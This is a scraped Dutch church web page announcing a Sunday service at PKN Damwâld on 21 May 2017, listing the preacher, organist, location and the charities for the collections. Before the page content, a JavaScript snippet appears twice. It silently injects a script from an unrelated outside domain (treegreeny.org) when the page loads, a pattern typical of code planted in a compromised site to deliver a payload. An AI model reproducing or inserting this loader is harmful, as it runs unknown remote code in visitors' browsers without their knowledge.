;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 21 mei 2017 9:30 uur - PKN Damwâld
zondag 21 mei 2017
09:30 uur
Voorbereiding Heilig Avondmaal

Kerkdienst zondag 21 mei 2017 9:30 uur

Informatie

Voorganger:Ds. P.R. Beintema, Leeuwarden
Organist:Margrietha Zagema
Mededeling:Voorbereiding Heilig Avondmaal
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kinderen van Orbei

Sinds 1995 is de stichting Orhei actief in het Oost Europese land Moldavië. Het land wordt momenteel aangemerkt als het allerarmste land van Europa.
De missie van de stichting Orhei is het helpen creëren van het noodzakelijke fundament, een stevige basis, waarmee kansarme minderjarigen en volwassenen in Moldavië zelf in staat worden gesteld haar eigen situatie te verbeteren en daarmee een grondslag te kunnen leggen voor een betere toekomst.

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris